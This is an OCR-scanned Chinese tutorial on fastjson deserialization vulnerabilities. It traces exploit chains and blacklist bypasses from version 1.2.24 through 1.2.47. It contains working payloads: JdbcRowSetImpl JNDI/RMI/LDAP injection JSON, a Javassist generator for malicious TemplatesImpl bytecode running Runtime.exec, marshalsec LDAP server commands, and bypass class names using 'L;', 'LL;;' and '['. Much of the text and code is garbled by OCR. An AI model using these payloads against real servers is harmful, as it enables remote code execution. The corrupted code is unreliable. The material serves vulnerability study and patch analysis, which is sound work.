和 以 我 们 上 面 例子 中 的 getsex 方 法 没有 被 调用 是 因为 返回 类 型 不 符合 ， 而 getprop 方 法 被 成 功 调用 是 
MiAProperties 继承 Hashtable， 而 Hashtable 实 现 了 Map 接 口 ， 返 回 类 型 符合 条 件 。 
四 天 便 看 一 下 最 后 触发 方法 调用 的 地 方 


Omalibaba.fastjson.parser.deserializer.FieldDeserializer#setValue, (在 被 调用 的 方法 中 下 断 点 
BPEJ) 
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(à DefaultFieldDeserializer java iG FieldDeserializer java 





那么 至 此 我 们 可 以 知道 


* @type 可 以 指定 反 序列 化 成 服务 器 上 的 任意 类 

。 然后 服务 端 会 解析 这 个 类 ， 提 取出 这 个 类 中 符合 要 求 的 setter 方 法 与 getter 方 法 (如 setxxx) 

。 如 果 传 入 json 字 符 串 的 键 值 中 存在 这 个 值 (如 xxx)， 就 会 去 调用 执行 对 应 的 setter、gette 访 湖 
( 即 setxxx 方 法 、getxxx 方 法 ) | 


看 上 去 应 该 是 挺 正 常 的 使 用 逻辑 ， 反 序列 化 需要 调用 对 应 参数 的 setter、getter 方 法 来 恢复 数据 5 


但 是 在 可 以 调用 任意 类 的 情况 下 ， 如 果 setter、getter 方 法 中 存在 可 以 利用 的 情况 ， 就 会 导致 任意 多 
令 执行 。 


对 应 反 序 列 化 攻击 利用 三 要 素来 说 ， 以 上 我 们 就 是 找到 了 readObject 复 写 点 ， 下 面 来 探讨 反 序列 他 
利用 链 。 


我 们 先 来 看 最 开始 的 漏洞 版 本 是 <=1.2.24， 在 这 个 版 本 前 是 默认 支持 @type 这 个 属性 的 。 


【<=1.2.24】JNDI 注 入 利用 链 一 一 


com.sun.rowset.JdbcRowSetlmpl 


利用 条 件 
JNDI 注 入 利用 链 是 通用 性 最 强 的 利用 方式 ， 在 以 下 三 种 反 序列 化 中 均 可 使 用 : 


parse(jsonStr) 
parseObject(jsonStr) 
parseObject(jsonStr,Object.class) 


当然 JDK 版 本 有 特殊 需求 ， 在 JNDI 注 入 一 文中 已 说 过 ， 这 里 就 不 再 说 明 
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- s + E 


一 文中 我 们 已 经 介绍 了 利用 链 ， 把 漏洞 触发 代码 从 















g Wri = '"rmi://127.0.0.1:1099/aa"; 
mE ctx = new InitialContext(); 
lookup (uri); 


com.sun.rowset.JdbcRowSetImpl; 


E 
roid throws Exception { 
JdbcRowSetImpl JdbcRowSetImpl inc = new paca oue 
JdbcRowSetImpl inc.setDataSourceName('"rmi://127.0.0.1:1099/aa"); 


JdbcRowSetImpl inc.setAutoCommit(triue); 


i 用 fastjson 的 @type 来 使 服务 端 执行 以 上 代码 ， 可 以 看 到 我 们 需要 调用 的 两 个 函数 都 是 以 
S! 这 说 明 我 们 可 以 把 这 个 函数 当 作 setter 函 数 进行 调用 ! 


下 这 两 个 函数 接口 符 不 符合 setter 函 数 的 条 件 


l € void setDataSourceName(String vari) throws SQLException 
lic void setAutoCommit(boolean vari)throws SQLException 


PREKEAF Ist, HSIVHTGERAS 


Bautocommit: 
> jdk1.8.0 161 <1.8u191 (可 以 使 用 ldap 注 入 ) 
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abeo a VR al j 
package 版 本 24，; 
import com,alibaba, fastjson. JSON; 
import com.fastjson.User; 
public class POC [f 
String payload - "(\"@type\":\"com.sun. rowset . JdbcRowSetimp1\", \"dag 
JSON. parse(payload) ; 
} 
使 用 工具 起 一 个 ldap 服 务 


java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 
http://127.0.0.1:8090/sExecTest 


之 前 的 ExecTest.class， 也 不 用 修改 直接 上 来 
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t java.io.IOException; 

"t java.util.Hashtable; 
javax.naming.Context; 
javax.naming.Name; 

- javax.naming.spi.Objectractory; 


implements tory { 


Mic Object getol 
exec("xterm"); 
return null; 


ublic static String (St f 
B try { 
E Runtime.getRuntime().exec( caic.exe"); 
p ) catch (IOException var2) { 
var2.printStackTrace(); 


return ""; 


lüblic static void n(String{] varð) { 
exec("123"); 


译 后 使 用 python 起 web 服 务 


n http.server 8090 
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[«-1.2.24] JDK1.7 的 Templatesimpl 利 用 链 
利用 条 件 


基于 JDK1.7u21 Gadgets 的 触发 点 Templateslmple 的 利用 条 件 比 较 苛刻 : 


1. 服务 端 使 用 parseObject0 时 ， 必 须 使 用 如 下 格式 才能 触发 漏洞 : ISON. parseObject (input) 
Object.class, Feature.SupportNonPublicField); 


2. 服务 端 使 用 parse() 时 ， 需 要 JSON.parse(texti,Feature.SupportNonPublicField); 


这 是 因为 payload 需 要 赋值 的 一 些 属性 为 private 属 性 ， 服 务 端 必须 添加 特性 才 回去 从 json 中 恢复 
private 属 性 的 数据 
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Lc Templatesimpl java Lc AccessControllerjava Q TransformerFactoryImpl.java 


个 y Q + zn a | Match Case Words 


u* .printinitexti) 


3508. par seOp)ect(xext 


Jdk7u21 mine ` geteyilbyte() 


E. apache. xalan. inter Bal Xs] tosthax,TemplatesiInp]” ," hytecodes 








在 Github 上 传 的 项 目 中 版 本 24,jdk7u21, java 是 网 上 的 payload。 需 要 自己 编译 生成 一 个 class 迹 
件 不 是 很 方便 。 


在 版 本 24.jdk7u21_mine 中 自己 把 7u21 链 的 payload 中 拿 过 来 ， 自 己 改 了 下 ， 可 以 自动 生成 
payload. 
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plic static byte[] getevilbyte() throws Exception { 
- ClassPool pool = ClassPool.getDefault(); 
ctclass cc = pool.get(lala.class.getName()); 
VERS 


String cmd - J.Runtime.getRuntime( ).exec(\"calc\ "S 
£z 
cc.makeClassInitializer().insertBefore(cmd); 

Ct 

co 





~ String randomClassName = ‘\ala'+System.nanoTime(); 

X €c.setName(randomClassName); 

ee ee 

3 cc.setSuperclass((pool.get(AbstractTranslet.class.getName()))); 
EC 


“byte[] lalaByteCodes = cc.toBytecode(); 
^ return lalaByteCodes; 


payloa 

iic static void () throws Exception { 

BU esc j 

T byte(] evilCode - getevilbyte(); 

- String evilCode base64 = Base64.encodeBase64String(evilCode) ; Hbase 

| final String NASTY CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax 
String texti = "{"+ 

| "\"@type\":\"" + NASTY CLASS +"\","+ 

\""+evilCode base64+"\"],"+ 


name':'a.b',"4 


fH ' 

_ System.out.println(text1); 

E / HRS 

ParserConfig config = new ParserConfig(); 

? Object obj = JSON.parseObject(texti, Object.class, config, Feature.Suppc 


491 


try { 
poc(); 

} catch (Exception e) { 
e.printStackTrace(); 


可 以 看 到 payload 使 用 @type 反 序列 化 


了 com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 这 个 类 。 


最 终 payload 输 出 如 下 : 







("Gtype":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"," byt 


7u21 那 篇 文中 总 结 得 到 恶意 TemplatesImple 类 需要 满足 如 下 条 件 。 


1. Templatesimpl 类 的 _name 2 != null 

2. TemplatesImpl 类 的 _class 变量 == null 

3. Templatesimpl 类 的 _bytecodes 变量 != null 

4, Templatesimpl 类 的 _bytecodes 是 我 们 代码 执行 的 类 的 字 节 码 。 bytecodes 中 的 类 必 
是 com. sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的 子 类 

5. 我 们 需要 执行 的 恶意 代码 写 在 _bytecodes 变量 对 应 的 类 的 静态 方法 或 构造 方法 中 。 

6. Templateslmpl 类 的 _tfactory 需要 是 一 个 拥有 getExternalExtensionsMap() 方 法 的 类 ， 
jdk 自 带 的 TransformerFactoryimpl 类 


显而易见 1-3，5 均 符合 (_class 没 有 赋值 即 为 null) o 


然后 我 们 调用 满足 条 件 的 恶意 Templatesimple 类 的 getOutputProperties 方 法 ， 完 成 RCE。 这 是 
fastjson 将 自动 调用 字段 的 getter 方 法 导致 的 ， 我 们 看 一 下 getOutputProperties 方 法 是 否 满足 自 3 
用 getter 方 法 的 条 件 : 


com.sun.org.apache.xalan,internal,xsltc,trax.TemplatesImpl#getOutputProperties 


newTransformer().getOutputProperties(); 


tch (TransformerConfigurationException e) { 


rn nuii; 
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a q s 
p 


« [Xl 方法 名 长 度 大 于 等 于 4 

。[X] 非 静态 方法 

« [X] 以 get 开 头 且 第 4 个 字母 为 大 写 

» KASH 

IX 返回 值 类 型 继承 自 Collection Map AtomicBoolean Atomicinteger AtomicLong (上 面 举例 的 
时 候 说 过 Properties 继 承 自 Hashtables， 实 现 了 Map， 所 以 符合 ) 


BAPE TH NAS 


LAA _tfactory 可 以 是 一 个 空 的 对 象 ， 而 不 是 一 个 拥有 getExternalExtensionsMap 的 类 ? 
5 有 6ytecodes 为 什么 不 再 是 字 节 码 ， 而 是 需要 base64 编 码 ? 
弛 我 们 要 调用 TemplatesImple 类 的 getOutputProperties 方 法 ， 但 是 为 什么 

Æ outputProperties 字段 ， 多 了 一 个 ? 


factory 为 空 的 说 明 


在 fstson 组 件 对 于 以 上 这 一 串 东 西 进行 解析 时 ， 会 先 解析 出 @type 来 还 原 出 TemplatesImpl 类 。 然 
晤 再 根据 之 后 的 字段 将 TemplatesImpl 类 的 属性 赋值 ， 至 于 赋值 的 内 容 会 重新 进行 一 次 解析 。 


在 看 对 于 赋值 内 容 的 解析 步骤 时 ， 会 发 现 当 赋值 的 值 为 一 个 空 的 Object 对 象 时 ， 会 新 建 一 个 需要 赋 
慎 的 字段 应 有 的 格式 的 新 对 象 实例 。 


7com/alibaba/fast json/parser/deserializer/JavaBeanDeserializer.java:627 


een e PE 
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那么 _tfactory 的 应 有 的 格式 是 哪 来 的 呢 ， 从 定义 来 。 


/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl. java 


TransformerFactoryImpl _tfactory = > 
所 以 之 所 以 tfactory 的 json 字 符 串 的 值 为 空 是 OK 的 。 


_bytecodes 需 要 base64 编 码 


跟踪 _bytecodes 字段 的 值 处 理 ， 同 样 还 是 刚才 的 地 方 ， 但 是 由 于 _bytecodes 的 值 不 是 对 象 ， 
进入 另 一 个 赋值 方式 。 


/com/alibaba/fastjson/parser/deserializer/DefaultFieldDeserializer,java:71 





494 


org.apache.xalan.internal.xsitc.trax, Templatesimp! 





Com.alibaba.fastjson.serializer .ObjectArrayCodec#deserialze 


} 
JSONArray array = JSONArray(); 
parser.parseArray(componentClass, array, fieldName); 


(T) toObjectArray(parser, componentClass, array); 


omalibaba. fast json. parser. Default JSONParser#parseArray(java.lang.reflect.Type, 
eitil. collection, java.lang.Object) 


} else { 
val = deserializer.deserialze(this, type, i); 
} 
array.add(val); 
checkListResolve(array); 
J 
if (lexer.token() == JSONToken.COMMA) { 
lexer.nextToken(deserializer.getFastMatchToken()); 
continue; 
J 
} 
} finally ( 
this.setContext(context); 
j 


com.alibaba.fastjson.serializer .ObjectArrayCodec#deserialze 


public «T» 1 i 
final JSONLexer lexer = parser.lexer; 
if (lexer.token() == JSONToken.NULL) { 
lexer.nextToken(JSONToken. COMMA) ; 


return null; 


if (lexer.token() == JSONToken.LITERAL STRING) { 
byte[] bytes = lexer.bytesValue(); 
lexer.nextToken( JSONToken. COMMA) ; 
return (T) bytes; 


com.alibaba.fastjson.parser.JSONScanner#bytesValue 


C e[] bytesValue() { 
return IOUtils.decodeBase64(text, np + 1, sp); 





496 










ERZAR, FREMSTE bytel] ， 会 经 过 一 次 base64 解 码 。 这 是 应 该 是 


g aiei byte[] 中 做 的 一 个 内 部 规定 。 序 列 化 时 应 该 也 会 对 byte 自 动 base64 编 码 。 


isso" 


gy- T: 果然 如 此 。 


main(String[] args) { 
:1 User() 


\ 
) 


= JSON. toJSONString(use 


+serial 


JSON. parse(serializedStr1) 
+0bj4. getC .getName()) 


+0bj4) 


eObject(serializedStri) 
+obj5.getClass().getName()) 


+0b}5) 


2": "com. fastjson.User", "age”:11, "bit": "MmT///+AgIA=" j"name" :"lala"] 


. fastjson.User 
Fastjson .User@368bca43 
(C Ay 4 Fr :com.alibaba.fastjson.JSONObject 
HfG:{"bit": (50,100, -1,-1,-1,-128, -128,-128], "name" :"1ala","age":11) 


finished with exit code @ 





-getOutputProperties + E => getOutputProperties 方 法 
简单 的 删 掉 。 试 一 下 : 
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ima 


= 标准 m 





DE EI EE. 3:7 国 Termi M 3 ve A & 


可 以 发 现 ， 并 不 会 对 结果 造成 什么 影响 ， 可 见 这 个 _ 不 是 必须 的 。 
那么 是 在 哪里 对 这 个 _ 进 行 了 处 理 呢 ? 
在 字段 解析 之 前 ， 会 对 于 当前 字段 进行 一 次 智能 匹 


配 com.alibaba. fast json.parser.deserializer . JavaBeanDeserializer#parseField ; 


JSONLexer lexer = parser.lexer; 


FieldDeserializer fieldDeserializer = smartMatch(key); 75 SOR 


com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer&smartMatch 
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eyeldDeserializer wartMatch(String key) { . $ " 
Mf (key == nue) t 


return null; 


FieldDeserializer fieldDeserializer - getFieldDeserializer(key); 


Gf (fieldDeserializer == null) ( 
boolean startsWithIs = key.startsWith("is"); 


9 
6 
3 
} 
p 
"Vos 
if (fieldDeserializer == null) ( 
boolean snakeOrkebab = false; 
String key2 = null; 
Por (int i = 9; i < key.length(); ++i) ( 
E char ch = key.charAt(i); 
if (ch == '_') { 
bjeg snakeOrkebab = true; 
key2 = key.replaceAll(' ", ""); 
break; 
) eise if (ch == '-') { 
snakeOrkebab = true; 
根据 key2 = key.replaceAll("-", ""); 
4 break; 
} 
} 
Z7 接 了 
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然后 在 赋值 的 时 候 完美 触发 getoutputProperties 方 法 。 


com.alibaba.fastison.parser.deserializer .FieldDeserializer#setValue( java. lango 
ject, java.lang.Object) 


(value == 
&& fieldInfo.fieldClass.isPrimitive()) { 


, 


1 
Method method - fieldInfo.method; 
(method !- I4) 4 


(fieldInfo.getoOnly) { 


m 


} (Map.class.isAssignableFrom(method.getReturnTypel] 


Map map - (Map) method.invoke(object); 


那么 以 上 流程 就 是 _getoutputProperties 字段 => getOutputProperties 方法 具体 演变 的 组 
节 。 那 么 以 上 分 析 结果 也 让 我 们 知道 加 个 骚 气 的 小 杠 - 应 该 也 是 可 以 的 。 
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= 在 知道 Templates 触 发 类 原理 的 情况 下 ， 变 形 衍生 到 了 fastjson 中 完成 RCE。 


CE 
à.lang.0b B con 
Gadget 
Fastjson 抗 争 的 一 生 
在 讲述 完 最 开始 引发 漏洞 的 1.2.24 版 本 之 后 ， 其 实 接 下 来 的 部 分 才 是 开 起 此 篇 的 初衷 。 但 是 因为 基 
础 实在 是 差 + 懒 ， 直 到 现在 才 开 始 正文 。 
42.24 漏 洞 版 本 修复 
在 25 版 本 ， 针 对 1.2.24 版 本 进行 了 修复 。 
号 们 可 以 总 结 以 下 1.2.24 版 本 的 漏洞 产生 原因 
EE etype 该 关键 词 的 特性 会 加 载 任意 类 ， 并 给 提供 的 输入 字段 的 值 进行 恢复 ， 如 果 字段 有 
rnType 人 上 四 四 Sstier、getter 方 法 会 自动 调用 该 方法 ， 进 行 赋值 ， 恢 复出 整个 类 。 这 个 过 程 会 被 叫做 fastjson 
的 反 序 列 化 过 程 ， 注 意 不 要 把 这 个 过 程 跟 java 反 序列 化 过 程 混为一谈 。 它 们 两 个 是 同等 级 的 存 
在 ,而 不 是 前 者 基于 后 者 之 上 。 也 就 是 说 readObject() 反 序列 化 利用 点 那 一 套 在 这 根本 不 适 
, Eis 相应 的 @type 加 载 任意 类 + 符合 条 件 的 setter 与 getter 变 成 了 反 序列 化 利用 点 (个 人 总 结 的 
国王 要 素 中 的 反 序列 化 漏洞 触发 点 ) o 
变 的 细 1 zt 


| PRD LGAMsetter, getterz/&, Aux BIER E setter, getter JE 38] DUBAI) 
和 的 反 序列 化 利用 链 前 进 ， 比 如 具有 一 定 限制 条 件 的 Templatesimpl 利 用 链 ，JNDI! 注 入 的 利用 
E (个 人 总 结 三 要 素 中 的 反 序列 化 利用 链 ) 
PO 沿 着 链 就 会 到 最 后 的 payload 触 发 点 。 比 如 JNDI 的 远程 恶意 class 文 件 的 实例 化 操作 (构造 函 
数 ， 静态 方法 ) 或 调用 类 中 getObjectlnstance 方 法 ， 与 Templatesimpl 利 用 链 中 的 class 文 件 字 
第 码 的 的 实例 化 操作 (构造 函数 ， 静 态 方法 ) (个 人 总 结 三 要 素 中 的 反 序列 化 payload 触 发 点 ) 
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修复 则 是 针对 三 要 素 中 的 一 者 进行 截断 。 在 1.2.25 中 的 修复 原理 就 是 针对 了 反 序 列 化 漏洞 能 和 
行 限 制 。 对 于 @type 标签 进行 一 个 白 名 单 + 黑 名单 的 限制 机 制 |。 


使 用 万 能 的 idea 对 两 个 版 本 的 jar 包 进行 对 比 


可 以 注意 到 ， 在 解析 json 串 的 DefaultJSONParser® 中 做 了 一 行 代 码 的 修改 。 当 输入 的 键 值 
是 Qtype 时 ， 原 本 直接 对 值 对 应 的 类 进行 加 载 。 现 在 会 将 值 ref 传 入 checkAutoType 方 法 Ap 


checkAutoType 是 1.2.25 版 本 中 新 增 的 一 个 白 名 单 + 黑 名 单机 制 。 同 时 引入 一 个 配置 参 
数 AutoTypeSupport . BS 


Fastjson 默 认 AutoTypeSupport 为 False (开启 白 名 单机 制 ) , 3G SESEBRÓS ie FABRE 
修改 。 


ParserConfig.getGlobalInstance().setAutoTypeSupport(true); (关闭 白 名 单机 制 ) 
由 于 checkAutoType 中 两 条 路 线 的 代码 是 穿插 的 ， 我 们 先 来 看 默认 AutoTypeSupport 为 False BS 


代码 。 


1.2.25 版 本 com.alibaba.fastjson.parser .Parserconfig#checkAutoType( 开 启 白 名 单机 制 ) 
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lic Class<?> checkAutoType(String typeName, Class<?> expectClass) { 
l if (typeName == null) { 


return null; 


final String className = typeName.replace('$', '.'); 


, 
if (!autoTypeSupport) { 
for (int i = 9; i < denyList.length; ++i) { 


String deny = denyList[i]; 
if (className.startswith(deny)) { 





throw new JSONException("autoType is not support + typeNe 
} 
} 
for (int i = 9; i < acceptList.length; ++i) { 
String accept = acceptList[i]; 
if (className.startsWith(accept)) ( 
clazz - TypeUtils.loadClass(typeName, defaultClassLoader); 
if (expectClass != null && expectClass.isAssignableFrom(claz 
throw new JSONException("type not match. “ + typeName + 
} 
return clazz; 
t 
} 
H 
2/ 
7/185 
// 
if (!autoTypeSupport) { 
throw new JSONException("autoType is not support. ”+ typeName); 
} 
return clazz; 
Ld 


在 默认 的 AutoTypesupport 为 False 时 ， 要 求 不 匹配 到 黑 名 单 ， 同 时 必须 匹配 到 白 名 音 
相 可 以 成 功 加 载 。 


黑 名 单 ， 默 认 白 名 单 (最 下 面 ， 默 认为 空 ) 
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10 = j f 


LAU An Pur AE ARA Ds Poo AO Oh dla lc Ade AM ur JO E. MES Cae, DOS. MS 4 





v 











@ acceptList = (String[0]) 9585) 
这 条 路 完全 被 白 名 单 堵 死 了 ,所 以 默认 的 情况 下 是 不 可 能 绕 过 的 。 我 们 的 两 个 payload 也 都 被 
com,sun 这 一 条 黑 名 单 给 匹配 了 。 


1.2.25-1.2.41 绕 过 Bg 


所 以 接 下 来 所 谓 的 绕 过 都 是 在 服务 端 显 性 开启 AutoTypesupport2gTrue 的 情况 下 进行 的 。 (这 是 | 
一 个 很 大 的 限制 条 件 ) | 


我 们 先 来 看 显 性 修改 AutoTypeSupportATrue 时 的 代码 : 


1.2.25 版 本 com,alibaba.fastjson.parser.ParserConfig#checkAutoType( 关 闭 白 名 单机 制 ) 
















^ d Z1 


"public Class<?> checkAutoType(String typeName, Class<?> expectClass) { 
if (typeName == null) ( 


return r 


Ay 


} 
final String className = typeName.replace('S', '.'); 
if (autoTypeSupport || expectClass != null) { 

for (int i = 0; i < acceptList.length; ++i) £ 


String accept = acceptList[i]; 
(className.startsWith(accept)) { 
TypeUtils.loadClass(typeName, defaultClassLoader ) ; 


for (int i = 0; i < denyList.length; ++i) { 
String deny = denyList[i]; 
if (className.startsWith(deny)) { 


throw new JSONException("autoType is not support + typeNa 
} 

} 
} 
if (autoTypeSupport || expectClass != null) { 

clazz = TypeUtils.loadClass(typeName, defaultClassLoader ); 
} 
if (clazz != null) { 


if (ClassLoader.class.isAssignableFrom(clazz) 
|| DataSource.class.isAssignableFrom(clazz) 


jux 
throw new JSONException("autoType is not support. " + typeName); 
} 
(expectClass != null) { 
(expectClass.isAssignableFrom(clazz)) { 
I clazz 
) else ( 
throw new JSONException("type not match. " + typeName + 
} 
} 
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return clazz; 








可 见 在 显 性 关闭 白 名 单 的 情况 下 ， 我 们 也 需要 绕 过 黑 名 单 检测 ， 同 时 加 载 的 类 不 能 继承 自 


Classloader5 DataSource. 


看 似 我 们 只 能 找到 其 他 的 利用 类 跟 黑 名 单 进 行 硬 刚 。 但 我 们 再 跟 一 下 类 的 加 
载 TypeUtils.loadClass 就 会 有 所 发 现 。 


; Class«?» loadClass(String className, ClassLoader classLoader) 


f (className == null [| className.length() == ©) { 


1117 
LA, 


Class«?» clazz - mappings.get(className); 


if (clazz {= null) { 
return clazz; 

} 

if (className.charAt(?) == ‘[') { 
Class<?> componentType = loadClass(className.substring(), classl 
return Array.newInstance(componentType, ©).getClass(); 

} 


if (className.startswWith(".") && className.endsWith(";")) ( 
String newClassName = className.substring(i, className.length() - 
return loadClass(newClassName, classLoader); 


。 如 果 这 个 className 是 以 [ 开头 我 们 会 去 掉 [ 进行 加 载 ! 


但 是 实际 上 在 代码 中 也 可 以 看 见 它 会 返回 Array 的 实例 变 成 数组 。 在 实际 中 它 远 远 不 会 执行 到 这 
一 步 ， 在 json 捉 解析 时 就 已 UEM. 


。 如 果 这 个 className 是 以 上 开头 ; 结尾 ， 就 会 去 掉 开 头 和 结尾 进行 加 载 ! 
那么 加 上 LAA ; 结尾 实际 上 就 可 以 绕 过 所 有 黑 名 单 。 那 么 理所当然 的 payload 就 为 : 
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]I1.2.25- 41593 jndi ldap 


pe Lcom. sun. rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Ex 
网 2 .25-41 绕 过 7u21 


同样 加 上 L;， payload 太 长 了 且 不 唯一 ， 就 不 写 了 








> > 
n 
KA 
-Oader) { 
re has to be fa 
classLoac 
h() - 3) 
» 
rs of Existence - 
行 到 这 There has tob 








1.2.42 版 本 修复 


在 1.2.42 中 对 于 1.2.41 版 本 进行 了 修复 ， 对 于 两 个 jar 进 行 对 比 可 以 发 
现 Default JSONParser.java 没有 什么 关键 的 修改 。 





关键 是 在 ParserConfig.java 中 修改 了 以 下 两 点 : 


1. 修改 明文 黑 名 单 为 黑 名 单 hash 
2. 对 于 传 入 的 类 名 ， 删 除开 头 L 和 结尾 的 ; 


黑 名 单 大 致 形式 如 下 : 
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yHashCodes = new long ]{ 


-8720046426850100497L , 
-8109300701639721088L , 
-7966123106503199569L , 
-/766605818834748097L, 
-6835437086156813536L, 
-4837536971810737970L, 
-4082057040235125754L, 
-2364987/994247679115L, 
-1872417015366588117L, 





912109 So) (AL 


时 然 说 利用 hash 可 以 让 我 们 不 知道 禁用 了 什么 类 ， 

5 com.alibaba.fastjson.parser.ParserConfig#addDeny 市 

BY) Com.alibaba.fastjson.util.TypeUtils#fnvia_64 ， 我 们 理论 上 可 以 遍历 jar， 字 符 串 ， 类 
去 三 撞 得 到 这 个 hash 的 值 。 (因为 常用 的 包 是 有 限 的 ) 


Public st { 
hashCode = ; 
for( i = 0; i < key.length(); ++i){ 
ch = key.charAt(i); 
hashCode ^= ch; 
hashCode *= 


hashCode; 


有 ~ 个 





就 是 完成 了 这 样 的 事情 ， 并 列 出 了 目前 已 经 得 到 的 hash。 
于 传 入 的 类 名 ， 删 除开 头 L 和 结尾 的 ; 。 


Co i ‘ 
i Ry, ibaba. fast json. parser Parser Config#checkAutoType( java.lang.String, 
a Alang. Class<?>, int) 





long BASIC = ; 
r PRIME - ; 
((( (BASIC 
^ className.charAt(^)) 
* PRIME) 
^ className.charAt(className.length() - :)) 
* PRIME -- ) 
{ 
className = className.substring(., className.length() - i); 
} 
g h3 = (((((BASIC ^ className.charAt(^)) 
* PRIME) 
^ className.charAt(:)) 
* PRIME) 
^ className.charAt(^)) 
* PRIME; 


if (autoTypeSupport || expectClass != null) { 
long hash - h3; 


for (int i = 5; i « className.length(); ++i) { 
hash ^- className.charAt(i); 
hash *- PRIME; 





if (Arrays.binarySearch(acceptHashCodes, hash) >= ©) { 
clazz = TypeUtils.loadClass(typeName, defaultClassLoader 


if (clazz != null) { 
return clazz; 
} 
} 
(Arrays. binarySearch(denyHashCodes, hash) >= 
throw new JSONException( 
} 


确实 有 效 的 干掉 了 L 开 头 ; 结尾 的 payload。 
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oader, f£ 


eUtils.¢ 
+ typeNa 





1.2.42 绕 过 


入 可 以 发 现在 以 上 的 处 理 中 ， 只 删除 了 一 次 开头 的 L 和 结尾 的 ，， 这 里 就 好 像 使 用 黑 名 单 预 防 
5QL 注 入 ， 只 删除 了 一 次 敏感 词汇 的 防御 错误 一 样 ， 重 复 一 下 就 可 以 被 轻易 的 绕 过 。 所 以 payload 如 


Bn: 


J/1.2.42503 jndi ldap 

("etype" :"LLcom.sun.rowset.RowSetImpl;;","dataSourceName":"rmi://localhost:1099/ 
7/1.2.42503 7u21 

同样 加 上 LL ;;> payload 太 长 了 且 不 唯一 ， 就 不 写 了 








计算 器 


三 ”标准 “四 
M M MS 
CE c 
x X Y 
'127,0.0.1:39012' , 7 8 9 
-internal.xsitc.tea $ ADE 
4 5 6 


2.43 版 本 修复 


全 43 中 对 于 1 2 42 版 本 可 绕 过 的 情况 进行 了 修复 。 


6 
EU com.alibaba.fastjson.parser.ParserConfig&checkAutoType( java.lang.String, 
a 2 

Kallang. Class<?>, int) 的 部 分 代码 


511 


























long BASIC = ; 
long PRIME = ; 
f (((- ^ (iong)className.charAt(:)) * 18 
tots ^ (iong)className.charAt(:)) 
new JSONException( 
j 


className = className.substring( , className.length() - 1) 


可 见 就 对 了 LL 开头 的 绕 过 进行 了 封 堵 。 


至 此 我 们 之 前 的 两 个 利用 链 JdbcRowSetimpl 和 Templatesimpl 正 式 被 封 塔 了 (暂时 ) 。 在 服 
开 白 名 单 限制 的 情况 下 也 绕 不 过 黑 名 单 。 更 别 说 服务 端 默 认 是 开启 白 名 单 的 ， 这 时 候 fastjson 
已 经 很 小 了 。 


之 后 就 是 不 断 有 新 的 组 件 作 为 利用 链 引 入 进行 攻击 ， 和 黑 名 单 的 不 断 扩充 之 间 的 拉锯 战 。 (之 
说 过 着 一 切 都 是 在 显 性 关闭 白 名 单 的 情况 下 ) 


1.2.44 [ 限制 


1.244476 TloadclassE [ 的 利用 情况 ， 上 面 说 到 过 ， 实 际 上 这 种 形式 的 payload 是 用 不 了 的 。 


比如 FastjsonExpliot 框 架 中 的 {"@type":" 
[com. sun. rowset . JdbcRowSetImp1", "dataSourceName" : "####RMI_LDAP_ADDRESS###", “aut 
mmit": true} 
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在 服务 端 放 
济 Son 的 风 隐 


(之 前 也 和 但 十 在 42.44 中 仍然 对 于 这 类 类 名 进行 了 限制 ， 使 用 同样 的 payload 进 行 测试 。 


了 的 。 
, "autoC0 


tjson:1.2.44 
tommons-codgc:1.13 
ommons-io:2.6 


rà1g0.5A ParserConfig checkAutoType() 


12.45 黑 名 单 添加 


CUBE ERN 封 堵 了 一 些 可 以 绕 过 黑 名 单 的 payload， 比 如 : 







































































































































// 需 要 有 第 三 方 组 件 ibatis -core 3:0 
{"@type":"org.apache.ibatis.datasource. jndi.JndiDataSourceFactory", "p 


黑 名 单 封 堵 呢 ， 其 实 是 一 个 动态 的 过 程 ， 会 有 很 多 新 增 的 jar 包 ， SORA LA 7 ewe 
包 ， 就 会 引入 一 条 可 利用 链 ，， 或 者 jdk 又 被 发 气 出 了 新 增 的 链 等 等 都 会 导致 黑 名 单 可 被 
在 1.2.25 之 后 这 都 是 要 在 显 性 白 名 单 的 情况 下 ， 才 有 的 问题 。 


之 后 更 新 的 版 本 比如 1.2.46 也 都 在 补充 黑 名 单 
但 是 在 1.2.47 时 ， 一 个 全 新 的 payload 就 没有 这 种 限制 ， 通 杀 。 


1.2.47 3B? payload! 
我 们 在 分 析 1.2.47 时 ， 将 从 一 个 挖掘 0day 的 角度 去 一 步 步 分 析 ， 企 图 复 现 这 个 漏洞 的 挖掘 过 
然 正 向 看 ， 不 得 劲 。payload 在 最 后 给 出 。 
我 们 重新 来 理 一 


下 com.alibaba.fastjson.parser.ParserConfig&checkAutoType( java.lang.String, 
java.lang.Class<?>, int) 这 个 阻挠 我 们 的 方法 ， 上 面 我 们 提 到 过 白 名 单 开 关 时 我 们 走 的 ; 
样 的 路 线 ， 还 在 注释 中 提 到 会 有 一 些 固定 类 型 的 判断 ， 这 就 是 通 杀 payload 的 关键 。 


我 们 接 下 来 看 的 是 1.2.47 版 本 的 包 ， 我 们 看 总 结 后 的 代码 结构 : 
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EST 


m 





lass«?» checkAutoType(String typeName, Class<?> expectClass, int feature 
71 .ty } ; 





T 
2/3 
/1 
E 
//5 a 
// (X E 
if (autoTypeSupport || expectClass != null) ( 
long hash = h3; 
for (int i = 3; i < className.length(); ++i) { 
hash ^= className.charAt(i); 
hash *= PRIME; 
if (Arrays.binarySearch(acceptHashCodes, hash) >= ©) { 
clazz = TypeUtils.loadClass(typeName, defaultClassLoader, fs 
if (clazz Y= null) f 
return clazz; 
} 
} 
if (Arrays.binarySearch(denyHashCodes, hash) >= © && TypeUtils.c 
throw new JSONException("autoType is not support. " + typeNe 
1 
} 
J 
WA6. 从 一 个 Mapping 中 获取 这 个 类 名 的 类 ， 我 i 
if (clazz == null) { 
clazz = TypeUtils.getClassFromMapping(typeName) ; 
} 
7/1. Mg 
if (clazz == null) ( 
clazz - deserializers.findClass(typeName); 
} 
{/8.% 
if (clazz != null) { 
if (expectClass != nul! 
&& clazz != java.util.HashMap.class 
&& !expectClass.isAssignableFrom(clazz)) { 
throw new JSONException("type not match. " + typeName + " -> " 4 
} 
F 我 们 部 要 从 
return clazz; 
F 
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if (fautoTypeSupport) { 
long hash = h3; 
